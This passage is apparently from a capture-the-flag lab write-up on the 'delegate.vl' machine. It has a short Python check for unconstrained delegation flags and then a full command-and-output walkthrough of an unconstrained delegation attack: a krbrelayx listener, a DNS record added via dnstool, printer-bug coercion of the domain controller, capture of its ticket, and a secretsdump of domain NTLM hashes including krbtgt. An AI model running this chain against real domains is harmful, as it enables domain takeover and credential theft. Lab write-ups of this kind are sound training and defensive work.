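                "sAMAccountName": acct["sAMAccountName"],
                "userAccountControl": uac,
                "flags": decode_uac(uac),
            })
    return findings


# Constructed records: the DC, the machine account created with Powermad above
# (528384 is the value passed to Set-MachineAccountAttribute), and a normal user.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC1$", "userAccountControl": 532480},       # 0x82000: DC, expected
    {"sAMAccountName": "pwned$", "userAccountControl": 528384},     # 0x81000: workstation + unconstrained
    {"sAMAccountName": "N.Thompson", "userAccountControl": 66048},  # 0x10200: ordinary user
]

if __name__ == "__main__":
    print(decode_uac(528384))
    for finding in audit_delegation(SAMPLE_ACCOUNTS):
        print(finding)
```

With MachineAccountQuota at 10, as shown earlier, any domain user can create such an account, so this check belongs on a schedule alongside lowering ms-DS-MachineAccountQuota to 0 and alerting on userAccountControl changes that set 0x80000.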
Set up the listener (then wait for a connection):
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 krbrelayx.py -hashes :7A21990FCD3D759941E45C490F143D5F
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.105.77
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.105.77
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
Add the DNS record for PWNED, then start printerbug:
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 dnstool.py -u 'delegate.vl\pwned$' -p 12345 -r PWNED.delegate.vl -d 10.8.2.138 --action add -dns-ip 10.10.105.77 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ ls
addspn.py 'DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' krbrelayx.py LICENSE printerbug.py venv
bloodyAD dnstool.py lib PetitPotam README.md
┌──(venv)─(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ python3 printerbug.py delegate.vl/'PWNED$'@dc1.delegate.vl PWNED.delegate.vl
[*] Impacket v0.11.0 - Copyright 2023 Fortra
Password:12345
[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
Use impacket-secretsdump with the captured DC1$ ticket to get the hashes.
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ export KRB5CCNAME=$(pwd)/DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ klist
Ticket cache: FILE:/home/puck/vulnhub/delegate/krbrelayx/DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
Default principal: DC1$@DELEGATE.VL
Valid starting Expires Service principal
06/12/2024 07:13:23 06/12/2024 17:07:36 krbtgt/DELEGATE.VL@DELEGATE.VL
renew until 06/19/2024 07:07:36
┌──(puck㉿kali)-[~/vulnhub/delegate/krbrelayx]
└─$ impacket-secretsdump -k DC1.delegate.vl -just-dc-ntlm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32<REDACTED>e93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:6d93f6dbd8902d77f43e04bb1b1b5c6e:::
PWNED$:3101:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
[*] Cleaning up...
What a ride.